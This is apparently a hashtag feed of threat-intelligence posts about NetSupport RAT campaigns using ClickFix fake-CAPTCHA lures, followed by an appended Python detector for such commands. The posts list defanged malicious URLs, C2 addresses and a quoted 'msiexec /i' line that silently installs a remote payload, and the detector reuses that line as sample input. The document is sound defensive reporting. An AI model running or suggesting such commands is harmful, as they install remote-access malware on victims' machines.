#NetSupportRAT

2025-12-10

JS SMUGGLER Multi Stage Hidden iframes Obfuscated JavaScript Silent Redirectors NetSupport RAT Delivery

Pulse ID: 6939016e326fd6a1b64a4ad6
Pulse Link: otx.alienvault.com/pulse/69390
Pulse Author: Tr1sa111
Created: 2025-12-10 05:13:18

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #Java #JavaScript #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #bot #Tr1sa111

2025-12-09

Campaign uses ClickFix page to push NetSupport RAT

The SmartApeSG campaign, also known as ZPHP or HANEYMANEY, has evolved from using fake browser update pages to employing ClickFix-style fake CAPTCHA pages. This campaign distributes malicious NetSupport RAT packages as its initial infection vector. The attack chain begins with an injected script on compromised websites, which, under certain conditions, displays a fake CAPTCHA page. When users interact with this page, malicious content is injected into the Windows clipboard, prompting users to paste and execute it. This leads to the download and installation of NetSupport RAT, which maintains persistence through a Start Menu shortcut. The campaign frequently changes domains, packages, and C2 servers to evade detection.

Pulse ID: 69370db0cd2bc81cbbe13d51
Pulse Link: otx.alienvault.com/pulse/69370
Pulse Author: AlienVault
Created: 2025-12-08 17:41:04

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CAPTCHA #Clipboard #CyberSecurity #FakeBrowser #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #PHP #RAT #SmartApeSg #Windows #bot #AlienVault

2025-12-08

JS#SMUGGLER Deploying NetSupport RAT via Compromised Websites

JS#SMUGGLER is a web-based malware campaign that uses compromised websites to deliver the NetSupport RAT

Pulse ID: 6937559768d29b8bfdeb42c9
Pulse Link: otx.alienvault.com/pulse/69375
Pulse Author: cryptocti
Created: 2025-12-08 22:47:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #Malware #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #bot #cryptocti

2025-12-08

New JS#SMUGGLER malware campaign delivers #NetSupportRAT through compromised websites – hackers get full remote control of Windows machines.

Read: hackread.com/jssmuggler-netsup

#JSsmuggler #Malware #Cybersecurity #Windows

2025-12-08

SmartApeSG campaign uses ClickFix page to push NetSupport RAT

Pulse ID: 6936a7709dd0d1b331e8ad64
Pulse Link: otx.alienvault.com/pulse/6936a
Pulse Author: CyberHunter_NL
Created: 2025-12-08 10:24:48

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #SmartApeSg #bot #CyberHunter_NL

2025-12-03

Technical Analysis of Matanbuchus 3.0

Matanbuchus, a C++ malicious downloader offered as Malware-as-a-Service since 2020, has evolved to version 3.0. It comprises a downloader and main module, utilizing obfuscation techniques like junk code, encrypted strings, and API hashing. The malware implements anti-analysis features, including an expiration date and persistence via scheduled tasks. It communicates using encrypted Protobufs over HTTP(S), supporting various commands for payload execution, data collection, and system manipulation. Matanbuchus has been associated with ransomware operations and used to distribute other malware like Rhadamanthys and NetSupport RAT.

Pulse ID: 692ff91584de642b1a8cbd3b
Pulse Link: otx.alienvault.com/pulse/692ff
Pulse Author: AlienVault
Created: 2025-12-03 08:47:17

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #HTTP #InfoSec #Malware #MalwareAsAService #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #RansomWare #Rhadamanthys #bot #AlienVault

2025-11-26

The 'Bear' attacks: what we learned about the phishing campaign targeting Russian organizations

A hacking group named NetMedved has been conducting phishing attacks against Russian organizations since October 2025. The campaign uses malicious LNK files disguised as business documents to deliver NetSupport RAT malware. The attackers employ various techniques including PowerShell scripts, finger protocol, and anti-analysis checks. They utilize multiple domains for payload delivery and command and control. The group's infrastructure overlaps with previous campaigns from 2024, suggesting an evolution of tactics rather than a new actor. NetMedved's operations involve social engineering, custom obfuscation, and abuse of legitimate tools to evade detection and maintain persistence on compromised systems.

Pulse ID: 6926cae8043aabe58197d11e
Pulse Link: otx.alienvault.com/pulse/6926c
Pulse Author: AlienVault
Created: 2025-11-26 09:39:52

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #ICS #InfoSec #LNK #Malware #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #Russia #SocialEngineering #bot #AlienVault

2025-11-19

EVALUSION Campaign Delivers Amatera Stealer and NetSupport...

The eSentire Threat Response Unit identified a malware campaign using ClickFix as an initial access vector to deploy Amatera Stealer and NetSupport RAT. Amatera Stealer is a rebranded version of ACR Stealer, with advanced evasion techniques like WoW64 SysCalls to bypass security solutions. It targets crypto-wallets, browsers, and messaging apps. The attack chain involves social engineering, PowerShell stages, and a .NET-based downloader. Amatera communicates with its C2 server using encrypted channels and can deploy additional payloads. The campaign selectively targets systems with valuable data or domain membership before deploying NetSupport RAT. Recommendations include disabling mshta.exe, restricting the Run prompt, implementing phishing awareness training, and using Next-Gen AV or EDR solutions.

Pulse ID: 691cf085ce463d915d5c5dc8
Pulse Link: otx.alienvault.com/pulse/691cf
Pulse Author: AlienVault
Created: 2025-11-18 22:17:41

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #EDR #InfoSec #LUA #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #SocialEngineering #ThreatResponseUnit #bot #eSentire #AlienVault

2025-11-18

Researchers are tracking a new ClickFix campaign called EVALUSION, delivering Amatera Stealer and NetSupport RAT.

The chain begins with Run-dialog execution during fake CAPTCHA checks, followed by mshta.exe → PowerShell → PureCrypter → DLL injection into MSBuild.exe.

Amatera includes advanced evasion and broad data-harvesting features. NetSupport RAT is deployed only when valuable data is detected.
Related phishing activity involves XWorm, Cephas kits, SmartApeSG, and Tycoon 2FA.

Thoughts on this growing reliance on execution through supposedly “trusted” system tools?

💬 Share your perspective
👍 Follow us for more clear, unbiased threat reporting

#Infosec #CyberSecurity #ClickFix #AmateraStealer #NetSupportRAT #MalwareAnalysis #ThreatIntel #MaaS #PhishingKits #SecurityResearch

New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT
SANS Internet Storm Center - SANS.edu - Go Sentinels! (sans_isc@infosec.exchange)
2025-11-18
2025-11-17

New EVALUSION ClickFix campaign: Amatera Stealer and NetSupport RAT are being distributed

Security researchers at eSentire have discovered a malware campaign named EVALUSION that uses the now widespread ClickFix social engineering pattern to install the Amatera Stealer and the NetSupport RAT.

More: maniabel.work/archiv/265

#ClickFix #AmateraStealer #NetSupportRAT #infosec #infosecnews #BeDiS

2025-11-13

SmartApeSG campaign uses ClickFix page to push NetSupport RAT
#SmartApeSG #NetSupportRAT
isc.sans.edu/diary/32474

2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

#clipboardhijacking Script injected into clipboard:

msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

The downloaded file is an MSI for #NetSupportRAT

virustotal.com/gui/file/958586

Screenshot of a legitimate but compromised website displaying a #SmartApeSG fake CAPTCHA page for #FileFix style #ClickFix activity.

2025-08-22 (Friday): #SmartApeSG for #NetSupport #RAT (#NetSupportRAT)

Some sites have injected script that leads directly to the fake CAPTCHA page for #ClickFix instructions.

Other sites have injected script that redirects to the URL for the fake CAPTCHA page.

Direct example (compromised site --> script for CAPTCHA page):

- hxxps[:]//mexicobusiness[.]news/
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Redirect example (compromised site --> Redirect URL --> script for CAPTCHA page):

- hxxps[:]//myvocabulary[.]com/
- hxxps[:]//myevmanual[.]com/d.js <-- 302 found for next URL
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Either way, you get the same CAPTCHA page.

IOCs at github.com/malware-traffic/ind

cc: @monitorsg

Image: Fake CAPTCHA page from first example.
Image: Fake SmartApeSG injected script from first example.
Image: Fake CAPTCHA page from second example.
Image: Fake SmartApeSG injected script from second example.

2025-08-20 (Wednesday): #SmartApeSG for fake #CAPTCHA page with #ClickFix instructions that led to an MSI file for #NetSupport #RAT and the #NetSupportRAT infection led to #StealCv2.

Malware samples, a #pcap, and indicators at www.malware-traffic-analysis.net/2025/08/20/index.html

Image: Fake CAPTCHA page generated by SmartApeSG script injected into compromised website.
Image: ClickFix instructions from the fake CAPTCHA page.
Image: Traffic from the infection filtered in Wireshark.
Image: Script and traffic to download and run MSI file to install NetSupport RAT.

2025-07-15 (Tuesday): Tracking #SmartApeSG

The SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing your way through this leads to a #NetSupportRAT infection.

Compromised site (same as yesterday):

- medthermography[.]com

URLs for ClickFix style fake verification page:

- warpdrive[.]top/jjj/include.js
- warpdrive[.]top/jjj/index.php?W11WzmLj
- warpdrive[.]top/jjj/buffer.js?409a8bdbd9

Running the script for NetSupport RAT:

- sos-atlanta[.]com/lal.ps1
- sos-atlanta[.]com/lotu.zip?l=4773

#NetSupport RAT server (same as yesterday):

- 185.163.45[.]87:443

Traffic from an infection filtered in Wireshark and HTTPS URLs shown in Fiddler.

2025-07-14 (Monday): #SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing your way through this leads to a #NetSupportRAT infection.

Compromised site:

- medthermography[.]com

URLs for ClickFix style fake verification page:

- lebensversicherungvergleich[.]top/jjj/include.js
- lebensversicherungvergleich[.]top/jjj/index.php?OtKXgPVX
- lebensversicherungvergleich[.]top/jjj/buffer.js?4261984971

Running the script for NetSupport RAT:

- affordableasphalt-paving[.]com/lal.ps1
- affordableasphalt-paving[.]com/lotu.zip?l=3526

#NetSupport RAT server:

- 185.163.45[.]87:443

Image: Screenshot of ClickFix-style fake verification page with text for the script injected into the viewer's hijacked clipboard.
Image: Traffic from an infection filtered in Wireshark.
Image: Traffic from an infection filtered in Wireshark.
Image: NetSupport RAT persistent on an infected Windows host through a Windows registry update.

Example 1: #RunFix

As of 2025-07-03, the #SmartApeSG campaign is using RunFix style #ClickFix pages to distribute #NetSupportRAT

Image: Screenshot of a "RunFix" style ClickFix page from the SmartApeSG campaign.
Image: Details of network traffic from a NetSupport RAT infection via "RunFix" style ClickFix.

2025-06-27 (Friday): #SmartApeSG infection chain leading to #ClickFix lure leading to #NetSupportRAT

URL sequence leading to ClickFix:

- palcomp3[.]top/sss/buf.js
- palcomp3[.]top/sss/index.php?GQX1KqUM
- palcomp3[.]top/sss/bof.js?19ec2a189848bc0bfa

URL sequence after running ClickFix script:

- camplively[.]com/all.php
- camplively[.]com/smks.zip?lap=3928

SHA256 hash for smks.zip archive containing NetSupport RAT package:

3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5

NetSupportRAT C2: 185.163.45[.]30:443

cc: @monitorsg

Image: Injected SmartApeSG script in page from legitimate but compromised website. This injected script leads to the ClickFix page.
Image: Example of the ClickFix page and script injected into a victim's clipboard (clipboard hijacking) that the victim is asked to paste into Run window and run.
Image: URL sequence for the ClickFix page and the URLs for NetSupport RAT.
Image: Traffic from the infection filtered in Wireshark, showing the NetSupport RAT C2 traffic.
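An added detection example, not code from any of the posts above: a small Python classifier that flags the kind of Run-dialog one-liner these SmartApeSG and EVALUSION posts describe (msiexec installing a package from a remote URL with a script name passed as an MSI property, as in the 2025-09-22 post; mshta.exe or PowerShell fetching remote content) when run over process-creation command lines. The refang helper, the sample command lines and the function names are constructed for this example.

```python
"""Flag ClickFix / RunFix style one-liners in Windows process-creation command lines."""
import re

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# MSI public properties are upper-case NAME=value pairs, e.g. ISLANDABSTRACT=surgewarfare.bat
MSI_PROP_RE = re.compile(r"\b([A-Z][A-Z0-9_]{2,})=(\S+)")
SCRIPT_EXT = (".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta", ".zip")


def refang(text: str) -> str:
    """Undo the hxxps[:]//example[.]com defanging used in threat-intel posts (constructed helper)."""
    return text.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


def analyze_cmdline(cmdline: str) -> list[str]:
    """Return the reasons a command line resembles a ClickFix lure; an empty list means none."""
    cl = refang(cmdline)
    low = cl.lower()
    tokens = low.split()
    # Executable name without path (unquoted paths only; quoted paths would need shlex-style parsing)
    exe = tokens[0].rsplit("\\", 1)[-1] if tokens else ""
    urls = URL_RE.findall(cl)
    reasons: list[str] = []
    if exe.startswith("msiexec"):
        if ("/i" in tokens or "-i" in tokens) and urls:
            reasons.append("msiexec installs a package fetched from a remote URL")
        if urls and ("/qn" in tokens or "/quiet" in tokens):
            reasons.append("remote install runs silently with no UI")
        for name, value in MSI_PROP_RE.findall(cl):
            if value.lower().endswith(SCRIPT_EXT):
                reasons.append(f"MSI property {name} passes a script name ({value})")
    elif exe.startswith("mshta") and urls:
        reasons.append("mshta.exe launched with a remote URL")
    elif exe.startswith(("powershell", "pwsh")):
        if urls or re.search(r"downloadstring|invoke-webrequest|\biwr\b|\birm\b", low):
            reasons.append("PowerShell fetching remote content")
        if re.search(r"-(enc|encodedcommand|e)\b", low):
            reasons.append("encoded PowerShell command")
    return reasons


# Constructed sample lines: the first is the defanged command quoted in the 2025-09-22 post.
SAMPLE_CMDLINES = [
    "msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn",
    r"msiexec /i C:\installers\app.msi /qn",          # routine local silent install
    "mshta https://example.test/verify.hta",          # placeholder URL, not an indicator
    "powershell -ep bypass -c Get-Date",              # no download, not flagged
]


def flagged_samples() -> dict[str, list[str]]:
    """Map each sample command line to its reasons, keeping only the flagged ones."""
    return {c: r for c in SAMPLE_CMDLINES if (r := analyze_cmdline(c))}
```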
